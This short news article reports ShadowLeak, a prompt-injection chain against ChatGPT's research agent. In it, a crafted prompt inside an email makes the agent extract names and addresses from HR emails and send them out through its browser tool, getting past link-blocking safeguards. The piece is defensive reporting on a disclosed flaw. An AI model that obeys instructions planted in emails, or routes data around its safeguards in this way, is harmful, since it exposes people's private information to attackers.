A new attack named ShadowLeak targets OpenAI’s cloud-based ChatGPT research agent, revealing how data can be exfiltrated from Gmail inboxes via a prompt-injection chain.
Security researchers demonstrated a PoC in which a crafted prompt embedded in an email directed the agent to scan messages and extract names and addresses from a company’s HR emails, then send that data to an external endpoint.
OpenAI’s safeguards typically block actions like clicking links or using markdown links to prevent leakage, but the researchers showed the attack could bypass these measures by using the agent’s browser tool to open a public lookup page and log the retrieved information.
Radware’s analysis describes ShadowLeak as exploiting email access, tool use, and autonomous web calls to achieve silent data exfiltration, noting that OpenAI was alerted privately before mitigations were applied.
The incident highlights the ongoing risk of deploying autonomous AI agents with access to private communications. Industry groups urge careful deployment, layered security controls, and ongoing research to harden systems against prompt-injection exploits.